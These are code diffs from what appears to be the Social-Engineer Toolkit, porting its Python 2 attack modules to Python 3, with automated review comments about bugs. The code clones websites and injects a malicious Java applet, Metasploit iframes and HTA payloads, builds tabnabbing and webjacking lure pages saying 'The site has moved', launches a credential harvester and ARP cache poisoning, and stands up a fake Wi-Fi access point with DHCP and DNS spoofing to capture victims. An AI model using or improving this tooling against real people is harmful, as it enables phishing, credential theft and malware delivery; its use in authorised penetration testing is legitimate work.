flag_off("Tabnabbing")
return_menu()
tabnabbing="off"
harvester="off"
tabnabbing = "off"
harvester = "off"
# toggle flags here
toggleflag_tabnab=(bcolors.RED+" (OFF)" + bcolors.ENDC)
toggleflag_tabnab = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# turn webjacking on
if profile== "5":
if profile == "5":
if webjacking == "off":
flag_on("Web Jacking")
webjacking="on"
webjacking = "on"
return_menu()
trigger=1
trigger = 1
if tabnabbing == "on" or mlitm == "on":
print "[*] You cannot use MLITM and Tabnabbing in the same attack!"
print "[*] Disabling MLITM and/or Tabnabbing"
mlitm="off"
tabnabbing="off"
harvester="on"
print("[*] You cannot use MLITM and Tabnabbing in the same attack!")
print("[*] Disabling MLITM and/or Tabnabbing")
mlitm = "off"
tabnabbing = "off"
harvester = "on"
# toggle flags here
toggleflag_mlitm=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
toggleflag_tabnab=(bcolors.RED+" (OFF)" + bcolors.ENDC)
toggleflag_harv=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
toggleflag_mlitm = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
toggleflag_tabnab = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_harv = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if harvester == "off":
harvester="on"
toggleflag_harv=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
toggleflag_webjacking=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
harvester = "on"
toggleflag_harv = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
toggleflag_webjacking = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if webjacking == "on":
if trigger != 1:
flag_off("Web Jacking")
return_menu()
webjacking="off"
webjacking = "off"
# toggle flags here
toggleflag_webjacking=(bcolors.RED+" (OFF)" + bcolors.ENDC)
toggleflag_webjacking = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# next series of flags needed
payloadgen=0
payloadgen = 0
# write handler files for detection
if java_applet == "on":
write_file("multi_java","multiattack=java_on")
write_file("multi_java", "multiattack=java_on")
if meta_attack == "on":
write_file("multi_meta","multiattack=meta_on")
write_file("multi_meta", "multiattack=meta_on")
if tabnabbing == "on":
write_file("multi_tabnabbing","multiattack=tabnabbing_on")
write_file("multi_tabnabbing", "multiattack=tabnabbing_on")
if harvester == "on":
write_file("multi_harvester","multiattack=harvester_on")
write_file("multi_harvester", "multiattack=harvester_on")
if mlitm == "on":
write_file("multi_mlitm","multiattack=mlitm_on")
write_file("multi_mlitm", "multiattack=mlitm_on")
if webjacking == "on":
write_file("multi_webjacking","multiattack=webjacking_on")
write_file("multi_webjacking", "multiattack=webjacking_on")
# hit cloner flag
# if any of the flags are turned on, then trigger to see if ARP Cache needs to be enabled
if java_applet =="on" or meta_attack == "on" or harvester == "on" or tabnabbing == "on" or mlitm == "on":
# if any of the flags are turned on, then trigger to see if ARP Cache
# needs to be enabled
if java_applet == "on" or meta_attack == "on" or harvester == "on" or tabnabbing == "on" or mlitm == "on":
# web cloner start here
sys.path.append("src/webattack/web_clone")
debug_msg(me,"importing 'src.webattack.web_clone.cloner'",1)
try: reload(cloner)
except: import cloner
debug_msg(me, "importing 'src.webattack.web_clone.cloner'", 1)
try:
reload(cloner)
except:
import cloner
# arp cache attack, will exit quickly
# if not in config file
if operating_system != "windows":
sys.path.append("src/core/arp_cache")
debug_msg(me,"importing 'src.core.arp_cache.arp'",1)
try: reload(arp)
except: import arp
debug_msg(me, "importing 'src.core.arp_cache.arp'", 1)
try:
reload(arp)
except:
import arp
# start the stuff for java applet
if java_applet == "on":
sys.path.append("src/core/payloadgen/")
debug_msg(me,"importing 'src.core.payloadgen.create_payloads'",1)
try: reload(create_payloads)
except: import create_payloads
payloadgen=1
debug_msg(me, "importing 'src.core.payloadgen.create_payloads'", 1)
try:
reload(create_payloads)
except:
import create_payloads
payloadgen = 1
applet_choice()
# start the stuff for metasploit client side
@ -328,43 +347,51 @@ if meta_attack == "on":
sys.path.append("src/webattack/browser_exploits/")
import gen_payload
# this checks to see if the MSF payload uses webdav, if so we have to force port 80
# this checks to see if the MSF payload uses webdav, if so we have to
# force port 80
if os.path.isfile(setdir + "/webdav_enabled"):
webdav_enabled="on"
webdav_enabled = "on"
# set this incase msf attack, java applet, and harvester is needed
pexpect_flag="off"
pexpect_flag = "off"
# start the stuff for harvester
if harvester == "on" or tabnabbing == "on" or webjacking == "on":
if tabnabbing == "on" or webjacking == "on":
# if tabnabbing is on, set th tabnabbing to on
sys.path.append("src/webattack/tabnabbing")
debug_msg(me,"importing 'src.webattack.tabnabbing.tabnabbing'",1)
try: reload(tabnabbing)
except: import tabnabbing
debug_msg(me, "importing 'src.webattack.tabnabbing.tabnabbing'", 1)
try:
reload(tabnabbing)
except:
import tabnabbing
# if the harvester is on set the multi_harvester flag
sys.path.append("src/webattack/harvester")
if java_applet == "on" or meta_attack == "on":
pexpect_flag="on"
a=subprocess.Popen("python src/webattack/harvester/harvester.py", shell=True)
pexpect_flag = "on"
a = subprocess.Popen(
"python src/webattack/harvester/harvester.py", shell=True)
# start stuff for mlitm
if mlitm == "on":
sys.path.append("src/webattack/mlitm")
if java_applet == "on" or meta_attack == "on":
a=subprocess.Popen("python src/mlitm/mlitm.py")
a = subprocess.Popen("python src/mlitm/mlitm.py")
else:
debug_msg(me,"importing 'src.mlitm.mlitm'",1)
try: reload(mlitm)
except: import mlitm
debug_msg(me, "importing 'src.mlitm.mlitm'", 1)
try:
reload(mlitm)
except:
import mlitm
# start the web server
if java_applet == "on" or meta_attack == "on":
sys.path.append("src/html/")
debug_msg(me,"importing 'src.html.spawn'",1)
try: reload(spawn)
except: import spawn
debug_msg(me, "importing 'src.html.spawn'", 1)
try:
reload(spawn)
except:
import spawn
# if using cred harvester or tabnabbing
if harvester == "on" or tabnabbing == "on":
@ -376,6 +403,6 @@ if java_applet == "on" or meta_attack == "on":
a.terminate()
except AttributeError:
# if it fails pull pid for subprocess thread then terminate it
os.kill( a.pid , signal.SIGTERM)
os.kill(a.pid, signal.SIGTERM)
print_status("\nReport exported.")
return_continue()


@ -5,6 +5,7 @@
from src.core.setcore import return_continue, print_info
def prep_website():
print_info("This feature is currently under development and disabled.")
return_continue()


@ -1,7 +1,7 @@
#!/usr/bin/env python
import subprocess
import re
import urllib2
import urllib.request, urllib.error, urllib.parse
import os
from src.core.setcore import *
#
@ -10,66 +10,68 @@ from src.core.setcore import *
#
# pull the timing for SET CONFIG on webjacking
fileopen=file("/etc/setoolkit/set.config", "r")
fileopen = open("/etc/setoolkit/set.config", "r")
for line in fileopen:
match=re.search("WEBJACKING_TIME=", line)
match = re.search("WEBJACKING_TIME=", line)
if match:
line=line.replace("WEBJACKING_TIME=", "")
webjacking_timing=line
line = line.replace("WEBJACKING_TIME=", "")
webjacking_timing = line
# grab attack_vector specification
fileopen=file(setdir + "/attack_vector", "r")
fileopen = open(setdir + "/attack_vector", "r")
for line in fileopen:
attack_vector=line.rstrip()
attack_vector = line.rstrip()
# need to see if we created file to trigger multi attack webjacking
multi_webjacking="off"
multi_webjacking = "off"
if os.path.isfile(setdir + "/multi_webjacking"):
multi_webjacking="on"
multi_webjacking = "on"
# Open the IPADDR file
ipaddr=""
ipaddr = ""
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
# pull URL field so we can pull favicon later on
fileopen=file(setdir + "/site.template","r").readlines()
fileopen = open(setdir + "/site.template", "r").readlines()
for line in fileopen:
match=re.search("URL=",line)
match = re.search("URL=", line)
if match:
URL=line.replace("URL=", "")
URL = line.replace("URL=", "")
if attack_vector == "tabnabbing":
URL=URL.replace("https://", "")
URL=URL.replace("http://", "")
URL=re.split("/", URL)
URL=URL[0]
URL="http://"+URL
URL = URL.replace("https://", "")
URL = URL.replace("http://", "")
URL = re.split("/", URL)
URL = URL[0]
URL = "http://" + URL
# move cloned site to index2.html
subprocess.Popen("mv %s/web_clone/index.html %s/web_clone/index2.html" % (setdir,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen("mv %s/web_clone/index.html %s/web_clone/index2.html" %
(setdir, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# grab the source and write it out to the cloned directory
fileopen=file("src/webattack/tabnabbing/source.js", "r")
fileopen = open("src/webattack/tabnabbing/source.js", "r")
# write it to dir
filewrite=file(setdir + "/web_clone/source.js", "w")
filewrite = open(setdir + "/web_clone/source.js", "w")
# loop
for line in fileopen:
line=line.rstrip()
match=re.search("URLHERE", line)
line = line.rstrip()
match = re.search("URLHERE", line)
if match:
line=line.replace("URLHERE", URL)
filewrite.write(line+"\n")
line = line.replace("URLHERE", URL)
filewrite.write(line + "\n")
filewrite.close()
if attack_vector == "tabnabbing":
# grab favicon
favicon = urllib2.urlopen("%s/favicon.ico" % (URL))
output = open(setdir + '/web_clone/favicon.ico','wb')
favicon = urllib.request.urlopen("%s/favicon.ico" % (URL))
output = open(setdir + '/web_clone/favicon.ico', 'wb')
output.write(favicon.read())
output.close()
filewrite1=file(setdir + "/web_clone/index.html", "w")
filewrite1.write('<head><script type="text/javascript" src="source.js"></script></head>\n')
filewrite1 = open(setdir + "/web_clone/index.html", "w")
filewrite1.write(
'<head><script type="text/javascript" src="source.js"></script></head>\n')
filewrite1.write("<body>\n")
filewrite1.write("Please wait while the site loads...\n")
filewrite1.write("</body>\n")
@ -77,11 +79,13 @@ if attack_vector == "tabnabbing":
# define webjacking or multi webjacking here
if attack_vector == "webjacking" or multi_webjacking == "on":
filewrite1=file(setdir + "/web_clone/index.html", "w")
filewrite1 = open(setdir + "/web_clone/index.html", "w")
filewrite1.write("<script>\n")
filewrite1.write("function a(){\n")
filewrite1.write('''a= window.open("http://%s/index2.html", "iframe", "");\n''' % (ipaddr));
filewrite1.write(
'''a= window.open("http://%s/index2.html", "iframe", "");\n''' % (ipaddr))
filewrite1.write("}\n")
filewrite1.write("</script>\n")
filewrite1.write('''<a href="%s" onclick="t=setTimeout('a()', %s);" target="iframe"><h1>The site %s has moved, click here to go to the new location.</h1></a>\n''' % (URL,webjacking_timing,URL))
filewrite1.write('''<a href="%s" onclick="t=setTimeout('a()', %s);" target="iframe"><h1>The site %s has moved, click here to go to the new location.</h1></a>\n''' %
(URL, webjacking_timing, URL))
filewrite1.close()
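Review bot: `URL` (from `URL = line.replace("URL=", "")`) and `webjacking_timing` (from `webjacking_timing = line` in the `@ -10,66 +10,68 @@` hunk) keep the trailing newline of the line they were read from, since neither `readlines()` nor file iteration strips it, and both are then interpolated into the favicon request URL, the generated `href` and the `setTimeout('a()', %s)` call; `URL = line.replace("URL=", "").rstrip()` and `webjacking_timing = line.replace("WEBJACKING_TIME=", "").rstrip()` fix it. The tabnabbing branch only sheds the newline when the URL has a path component to split on, so it does not reliably mask the problem. The `mv` through `subprocess.Popen(..., shell=True)` can be `os.rename(setdir + "/web_clone/index.html", setdir + "/web_clone/index2.html")` (`os` is already imported), which drops the shell and the unquoted `setdir`. The `urllib.request.urlopen` favicon fetch has no error handling, so a failed request aborts the script before `index.html` is written, and none of the reader `open()` handles in this file are closed.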


@ -10,7 +10,7 @@ import sys
import time
import re
import shutil
import urllib
import urllib.request, urllib.parse, urllib.error
operating_system = check_os()
definepath = os.getcwd()
@ -32,7 +32,7 @@ track_email = check_config("TRACK_EMAIL_ADDRESSES=").lower()
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = raw_input("Enter your IP address: ")
ipaddr = input("Enter your IP address: ")
update_options("IPADDR=" + ipaddr)
# Define base value
@ -48,7 +48,7 @@ if not os.path.isdir(setdir + "/web_clone/"):
# if we used a proxy configuration from the set-proxy
if os.path.isfile(setdir + "/proxy.confg"):
fileopen = file(setdir + "/proxy.config", "r")
fileopen = open(setdir + "/proxy.config", "r")
proxy_config = fileopen.read().rstrip()
# just do a ls
@ -60,7 +60,7 @@ if not os.path.isfile(setdir + "/proxy.confg"):
webdav_meta = 0
# see if exploit requires webdav
try:
fileopen = file(setdir + "/meta_config", "r")
fileopen = open(setdir + "/meta_config", "r")
for line in fileopen:
line = line.rstrip()
match = re.search("set SRVPORT 80", line)
@ -73,7 +73,7 @@ except:
template = ""
# Grab custom or set defined
fileopen = file(setdir + "/site.template", "r").readlines()
fileopen = open(setdir + "/site.template", "r").readlines()
for line in fileopen:
line = line.rstrip()
match = re.search("TEMPLATE=", line)
@ -84,7 +84,7 @@ for line in fileopen:
# grab attack_vector specification
attack_vector = ""
if os.path.isfile(setdir + "/attack_vector"):
fileopen = file(setdir + "/attack_vector", "r").readlines()
fileopen = open(setdir + "/attack_vector", "r").readlines()
for line in fileopen:
attack_vector = line.rstrip()
@ -104,7 +104,7 @@ update_options("APPLET_NAME=" + rand_gen_applet)
try:
# open our config file that was specified in SET
fileopen = file(setdir + "/site.template", "r").readlines()
fileopen = open(setdir + "/site.template", "r").readlines()
# start loop here
url_counter = 0
for line in fileopen:
@ -120,8 +120,8 @@ try:
# if we aren't using multi attack with templates do this
if url != "NULL":
if template != "SET":
print(bcolors.YELLOW + "\n[*] Cloning the website: " + (url))
print("[*] This could take a little bit..." + bcolors.ENDC)
print((bcolors.YELLOW + "\n[*] Cloning the website: " + (url)))
print(("[*] This could take a little bit..." + bcolors.ENDC))
# clone the website
if template != "SELF":
@ -131,20 +131,19 @@ try:
# try except block in case no internet connection, route to Internet,
# etc.
try:
# check if we have wget, if we don't then use urllib2
wget = 0
if os.path.isfile("/usr/local/bin/wget"):
wget = 1
if os.path.isfile("/usr/bin/wget"):
wget = 1
if os.path.isfile("/usr/local/wget"):
wget = 1
# check if we have wget, if we don't then use urllib2 - special thanks to chrismaddalena for the pull request!
# wget is called, but output is sent to devnull to hide "wget:
# missing URL" error
DNULL = open(os.devnull, 'w')
wget = subprocess.call(
'wget', shell=True, stdout=DNULL, stderr=subprocess.STDOUT)
if wget == 1:
subprocess.Popen('%s;cd %s/web_clone/;wget --no-check-certificate -O index.html -c -k -U "%s" "%s";' % (
proxy_config, setdir, user_agent, url), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
if wget == 0:
else:
# if we don't have wget installed we will use python to rip,
# not as good as wget
headers = {'User-Agent': user_agent}
@ -157,7 +156,7 @@ try:
# if the site has cloned properly
site_cloned = True
# open file for writing
filewrite = file(setdir + "/web_clone/index.html", "w")
filewrite = open(setdir + "/web_clone/index.html", "w")
# write the data back from the request
filewrite.write(html)
# close the file
@ -169,30 +168,30 @@ try:
# If the website did not clone properly, exit out.
if not os.path.isfile(setdir + "/web_clone/index.html"):
print(
bcolors.RED + "[*] Error. Unable to clone this specific site. Check your internet connection.\n" + bcolors.ENDC)
print((
bcolors.RED + "[*] Error. Unable to clone this specific site. Check your internet connection.\n" + bcolors.ENDC))
return_continue()
site_cloned = False
# add file to let set interactive shell know it was unsuccessful
filewrite = file(setdir + "/cloner.failed", "w")
filewrite = open(setdir + "/cloner.failed", "w")
filewrite.write("failed")
filewrite.close()
if os.path.isfile(setdir + "/web_clone/index.html"):
fileopen = file(setdir + "/web_clone/index.html", "r")
fileopen = open(setdir + "/web_clone/index.html", "r")
counter = 0
for line in fileopen:
counter = counter + 1
if counter == 1 or counter == 0:
print(
bcolors.RED + "[*] Error. Unable to clone this specific site. Check your internet connection.\n" + bcolors.ENDC)
print((
bcolors.RED + "[*] Error. Unable to clone this specific site. Check your internet connection.\n" + bcolors.ENDC))
return_continue()
site_cloned = False
os.remove(setdir + "/web_clone/index.html")
# add file to let set interactive shell know it was
# unsuccessful
filewrite = file(setdir + "/cloner.failed", "w")
filewrite = open(setdir + "/cloner.failed", "w")
filewrite.write("failed")
filewrite.close()
@ -206,12 +205,12 @@ try:
# if we specify UNC embedding
if unc_embed == True:
fileopen = file(setdir + "/web_clone/index.html", "r")
fileopen = open(setdir + "/web_clone/index.html", "r")
index_database = fileopen.read()
filewrite = file(setdir + "/web_clone/index.html", "w")
filewrite = open(setdir + "/web_clone/index.html", "w")
# Open the UNC EMBED
fileopen4 = file("src/webattack/web_clone/unc.database", "r")
fileopen4 = open("src/webattack/web_clone/unc.database", "r")
unc_database = fileopen4.read()
unc_database = unc_database.replace("IPREPLACEHERE", ipaddr)
unc_database = unc_database.replace("RANDOMNAME", rand_gen_win)
@ -237,8 +236,8 @@ try:
# Here we parse through the new website and add our java applet code, its a hack for now
# Wrote this on the plane to Russia, easiest way to do this without
# internet access :P
print(
bcolors.RED + "[*] Injecting Java Applet attack into the newly cloned website." + bcolors.ENDC)
print((
bcolors.RED + "[*] Injecting Java Applet attack into the newly cloned website." + bcolors.ENDC))
# Read in newly created index.html
time.sleep(2)
if not os.path.isfile(setdir + "/web_clone/index.html"):
@ -247,12 +246,12 @@ try:
"Unable to clone the website it appears. Email us to fix.")
sys.exit()
fileopen = file(setdir + "/web_clone/index.html", "r")
fileopen = open(setdir + "/web_clone/index.html", "r")
# Read add-on for java applet
fileopen2 = file("src/webattack/web_clone/applet.database", "r")
fileopen2 = open("src/webattack/web_clone/applet.database", "r")
# Write to new file with java applet added
filewrite = file(setdir + "/web_clone/index.html.new", "w")
fileopen3 = file("src/webattack/web_clone/repeater.database", "r")
filewrite = open(setdir + "/web_clone/index.html.new", "w")
fileopen3 = open("src/webattack/web_clone/repeater.database", "r")
# this is our cloned website
index_database = fileopen.read()
@ -353,17 +352,17 @@ try:
# close the file after done writing
filewrite.close()
print(bcolors.BLUE + "[*] Filename obfuscation complete. Payload name is: " + rand_gen_win +
"\n[*] Malicious java applet website prepped for deployment\n" + bcolors.ENDC)
print((bcolors.BLUE + "[*] Filename obfuscation complete. Payload name is: " + rand_gen_win +
"\n[*] Malicious java applet website prepped for deployment\n" + bcolors.ENDC))
# if we are using HTA attack
if check_options("ATTACK_VECTOR") == "HTA":
# </body>
if os.path.isfile(setdir + "/Launcher.hta"):
data1 = file(setdir + "/web_clone/index.html", "r").read()
data2 = file(setdir + "/hta_index", "r").read()
data1 = open(setdir + "/web_clone/index.html", "r").read()
data2 = open(setdir + "/hta_index", "r").read()
data3 = data1.replace("</body>", data2 + "</body>")
filewrite = file(setdir + "/web_clone/index.html", "w")
filewrite = open(setdir + "/web_clone/index.html", "w")
filewrite.write(data3)
filewrite.close()
print_status("Copying over files to Apache server...")
@ -386,8 +385,8 @@ try:
multi_meta = "on"
if attack_vector == "browser" or multi_meta == "on":
print(
bcolors.RED + "[*] Injecting iframes into cloned website for MSF Attack...." + bcolors.ENDC)
print((
bcolors.RED + "[*] Injecting iframes into cloned website for MSF Attack...." + bcolors.ENDC))
# Read in newly created index.html
if attack_vector == "multiattack":
if os.path.isfile(setdir + "/web_clone/index.html"):
@ -401,8 +400,8 @@ try:
shutil.copyfile(
setdir + "/web_clone/index.html.new", setdir + "/web_clone/index.html")
time.sleep(1)
fileopen = file(setdir + "/web_clone/index.html", "r").readlines()
filewrite = file(setdir + "/web_clone/index.html.new", "w")
fileopen = open(setdir + "/web_clone/index.html", "r").readlines()
filewrite = open(setdir + "/web_clone/index.html.new", "w")
counter = 0
for line in fileopen:
counter = 0
@ -435,8 +434,8 @@ try:
filewrite.close()
except:
pass
print(
bcolors.BLUE + "[*] Malicious iframe injection successful...crafting payload.\n" + bcolors.ENDC)
print((
bcolors.BLUE + "[*] Malicious iframe injection successful...crafting payload.\n" + bcolors.ENDC))
if attack_vector == "java" or attack_vector == "browser" or attack_vector == "multiattack":
if not os.path.isfile(setdir + "/web_clone/%s" % (rand_gen_applet)):
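Review bot: The new wget probe in the `@ -131,20 +131,19 @@` hunk treats wget as present when a bare `wget` run under the shell exits with status 1, which couples the check to wget's exit code for "missing URL" (and to the shell's 127 when the binary is absent); `shutil` is already imported in this file, so `wget = 1 if shutil.which("wget") else 0` states the intent directly and also removes the `DNULL` handle that is opened and never closed. If `html` in the `filewrite.write(html)` line of the `@ -157,7 +156,7 @@` hunk is the raw urllib response body, it is `bytes` under Python 3 and writing it to a text-mode file raises `TypeError` — the body should be decoded or the file opened with `"wb"`; the assignment of `html` is outside these hunks, so please confirm. The `print((...))` forms introduced throughout (e.g. `print((bcolors.YELLOW + "\n[*] Cloning the website: " + (url)))`) are the 2to3 artifact for code that already called `print` with parentheses; the extra pair reads as a tuple and should be dropped. The enclosing `try:` block for these hunks starts and ends outside them.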


@ -7,11 +7,14 @@ from src.core.setcore import *
# Simple python script to kill things created by the SET wifi attack vector
#
interface = raw_input(setprompt(["8"], "Enter your wireless interface (ex: wlan0): "))
interface = input(
setprompt(["8"], "Enter your wireless interface (ex: wlan0): "))
# fix a bug if present
print_status("Attempting to set rfkill to unblock all if RTL is in use. Ignore errors on this.")
subprocess.Popen("rmmod rtl8187;rfkill block all;rfkill unblock all;modprobe rtl8187;rfkill unblock all;ifconfig %s up" % (interface), shell=True).wait()
print_status(
"Attempting to set rfkill to unblock all if RTL is in use. Ignore errors on this.")
subprocess.Popen("rmmod rtl8187;rfkill block all;rfkill unblock all;modprobe rtl8187;rfkill unblock all;ifconfig %s up" % (
interface), shell=True).wait()
print_status("Killing airbase-ng...")
subprocess.Popen("killall airbase-ng", shell=True).wait()
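Review bot: The interface name read with `input(...)` goes straight into a `shell=True` command string (`... ifconfig %s up" % (interface)`), so a value containing whitespace or shell metacharacters changes the meaning of the whole `;`-chained command instead of failing cleanly. Since the value is typed by the operator and is only ever a device name, reject anything that does not look like one before building the command, e.g. `if not re.fullmatch(r"[A-Za-z0-9_.:-]+", interface): exit_set()` (with `import re` if the file lacks it), or run the `ifconfig` step as an argument list without a shell. The same unquoted interpolation of `interface` appears in the fake-AP script's airmon-ng pipeline.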


@ -24,13 +24,15 @@ sys.path.append(definepath)
if not os.path.isfile("/etc/init.d/isc-dhcp-server"):
print_warning("isc-dhcp-server does not appear to be installed.")
print_warning("apt-get install isc-dhcp-server to install it. Things may fail now.")
print_warning(
"apt-get install isc-dhcp-server to install it. Things may fail now.")
if not os.path.isfile(dnsspoof_path):
if os.path.isfile("/usr/sbin/dnsspoof"):
dnsspoof_path = "/usr/sbin/dnsspoof"
else:
print_warning("DNSSpoof was not found. Please install or correct path in set_config. Exiting....")
print_warning(
"DNSSpoof was not found. Please install or correct path in set_config. Exiting....")
exit_set()
if not os.path.isfile(airbase_path):
@ -38,11 +40,13 @@ if not os.path.isfile(airbase_path):
print_info("using SET's local airbase-ng binary")
print_info("For this attack to work properly, we must edit the isc-dhcp-server file to include our wireless interface.")
print_info("""This will allow isc-dhcp-server to properly assign IPs. (INTERFACES="at0")""")
print_info(
"""This will allow isc-dhcp-server to properly assign IPs. (INTERFACES="at0")""")
print("")
print_status("SET will now launch nano to edit the file.")
print_status("Press ^X to exit nano and don't forget to save the updated file!")
print_warning("If you receive an empty file in nano, please check the path of your isc-dhcp-server file!")
print_warning(
"If you receive an empty file in nano, please check the path of your isc-dhcp-server file!")
return_continue()
subprocess.Popen("nano /etc/dhcp/dhcpd.conf", shell=True).wait()
@ -75,11 +79,12 @@ subnet 192.168.10.0 netmask 255.255.255.0 {
}
""")
show_fakeap_dhcp_menu = create_menu(text.fakeap_dhcp_text, text.fakeap_dhcp_menu)
fakeap_dhcp_menu_choice = raw_input(setprompt(["8"], ""))
show_fakeap_dhcp_menu = create_menu(
text.fakeap_dhcp_text, text.fakeap_dhcp_menu)
fakeap_dhcp_menu_choice = input(setprompt(["8"], ""))
if fakeap_dhcp_menu_choice != "":
fakeap_dhcp_menu_choice = check_length(fakeap_dhcp_menu_choice,2)
fakeap_dhcp_menu_choice = check_length(fakeap_dhcp_menu_choice, 2)
# convert it to a string
fakeap_dhcp_menu_choice = str(fakeap_dhcp_menu_choice)
@ -89,7 +94,7 @@ if fakeap_dhcp_menu_choice == "":
if fakeap_dhcp_menu_choice == "1":
# writes the dhcp server out
print_status("Writing the dhcp configuration file to ~/.set")
filewrite=file(setdir + "/dhcp.conf", "w")
filewrite = open(setdir + "/dhcp.conf", "w")
filewrite.write(dhcp_config1)
# close the file
filewrite.close()
@ -98,7 +103,7 @@ if fakeap_dhcp_menu_choice == "1":
if fakeap_dhcp_menu_choice == "2":
# writes the dhcp server out
print_status("Writing the dhcp configuration file to ~/.set")
filewrite=file(setdir + "/dhcp.conf", "w")
filewrite = open(setdir + "/dhcp.conf", "w")
filewrite.write(dhcp_config2)
# close the file
filewrite.close()
@ -107,7 +112,8 @@ if fakeap_dhcp_menu_choice == "2":
if fakeap_dhcp_menu_choice == "exit":
exit_set()
interface = raw_input(setprompt(["8"], "Enter the wireless network interface (ex. wlan0)"))
interface = input(
setprompt(["8"], "Enter the wireless network interface (ex. wlan0)"))
# place wifi interface into monitor mode
print_status("Placing card in monitor mode via airmon-ng..")
@ -119,8 +125,9 @@ if os.path.isfile("/usr/local/sbin/airmon-ng"):
if not os.path.isfile("/usr/local/sbin/airmon-ng"):
airmonng_path = "src/wireless/airmon-ng"
monproc = subprocess.Popen("%s start %s | grep \"monitor mode enabled on\" | cut -d\" \" -f5 | sed -e \'s/)$//\'" % (airmonng_path,interface), shell=True, stdout=subprocess.PIPE)
moniface=monproc.stdout.read()
monproc = subprocess.Popen("%s start %s | grep \"monitor mode enabled on\" | cut -d\" \" -f5 | sed -e \'s/)$//\'" %
(airmonng_path, interface), shell=True, stdout=subprocess.PIPE)
moniface = monproc.stdout.read()
monproc.wait()
# execute modprobe tun
@ -128,24 +135,29 @@ subprocess.Popen("modprobe tun", shell=True).wait()
# create a fake access point
print_status("Spawning airbase-ng in a seperate child thread...")
child = pexpect.spawn('%s -P -C 20 -e "%s" -c %s %s' % (airbase_path,access_point,ap_channel,moniface))
child = pexpect.spawn('%s -P -C 20 -e "%s" -c %s %s' %
(airbase_path, access_point, ap_channel, moniface))
print_info("Sleeping 15 seconds waiting for airbase-ng to complete...")
time.sleep(15)
# bring the interface up
if dhcptun==1:
if dhcptun == 1:
print_status("Bringing up the access point interface...")
subprocess.Popen("ifconfig at0 up", shell=True).wait()
subprocess.Popen("ifconfig at0 10.0.0.1 netmask 255.255.255.0", shell=True).wait()
subprocess.Popen(
"ifconfig at0 10.0.0.1 netmask 255.255.255.0", shell=True).wait()
subprocess.Popen("ifconfig at0 mtu 1400", shell=True).wait()
subprocess.Popen("route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1", shell=True).wait()
subprocess.Popen(
"route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1", shell=True).wait()
if dhcptun==2:
if dhcptun == 2:
print_status("Bringing up the access point interface...")
subprocess.Popen("ifconfig at0 up", shell=True).wait()
subprocess.Popen("ifconfig at0 192.168.10.1 netmask 255.255.255.0", shell=True).wait()
subprocess.Popen(
"ifconfig at0 192.168.10.1 netmask 255.255.255.0", shell=True).wait()
subprocess.Popen("ifconfig at0 mtu 1400", shell=True).wait()
subprocess.Popen("route add -net 192.168.10.0 netmask 255.255.255.0 gw 192.168.10.1", shell=True).wait()
subprocess.Popen(
"route add -net 192.168.10.0 netmask 255.255.255.0 gw 192.168.10.1", shell=True).wait()
# starts a dhcp server
print_status("Starting the DHCP server on a seperate child thread...")
@ -159,7 +171,10 @@ child3 = pexpect.spawn("echo 1 > /proc/sys/net/ipv4/ip_forward")
print_status("Starting DNSSpoof in a seperate child thread...")
child4 = pexpect.spawn("%s -i at0" % (dnsspoof_path))
print_status("SET has finished creating the attack. If you experienced issues please report them.")
print_status("Now launch SET attack vectors within the menus and have a victim connect via wireless.")
print_status("Be sure to come back to this menu to stop the services once your finished.")
print_status(
"SET has finished creating the attack. If you experienced issues please report them.")
print_status(
"Now launch SET attack vectors within the menus and have a victim connect via wireless.")
print_status(
"Be sure to come back to this menu to stop the services once your finished.")
return_continue()
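Review bot: `moniface = monproc.stdout.read()` in the `@ -119,8 +125,9 @@` hunk now yields `bytes` under Python 3 (the Popen pipe is not opened in text mode), so the `'%s -P -C 20 -e "%s" -c %s %s' % (airbase_path, access_point, ap_channel, moniface)` command in the next hunk embeds the literal `b'...'` repr and airbase-ng is started on a nonexistent interface; the value also carries the pipeline's trailing newline. `moniface = monproc.stdout.read().decode().strip()` addresses both. The `interface` value from `input(...)` a few lines earlier is interpolated unquoted into that `shell=True` pipeline as well and should be checked against an interface-name pattern before use. The remaining `raw_input` → `input` and `file` → `open` conversions in this file look correct.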